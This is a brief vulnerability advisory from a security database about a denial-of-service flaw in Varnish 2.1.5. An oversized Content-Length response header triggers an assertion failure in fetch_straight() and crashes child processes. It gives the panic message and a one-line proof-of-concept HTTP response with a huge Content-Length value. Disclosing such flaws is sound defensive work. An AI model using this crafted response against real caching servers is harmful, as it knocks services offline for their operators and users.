Varnish 2.1.5 DoS in fetch_straight() while parsing Content-Length header

2013-03-11T00:00:00
ID SECURITYVULNS:DOC:29156
Type securityvulns
Reporter Securityvulns
Modified 2013-03-11T00:00:00

Description

fetch_straight() | ((uintmax_t)cl == cll)

Authors:

22733db72ab3ed94b5f8a1ffcde850251fe6f466

c8e74ebd8392fda4788179f9a02bb49337638e7b

AKAT-1

Versions: 2.1.5

Summary

It is possible to crash (via assert) varnish child processes by sending invalid Content-Length reponse header.

  • Panic message: Assert error in fetch_straight(), cache_fetch.c line 65:#012 Condition((uintmax_t)cl == cll) not true.

POC(response): -- cut -- HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: 99999999999999999

-- cut -- EOF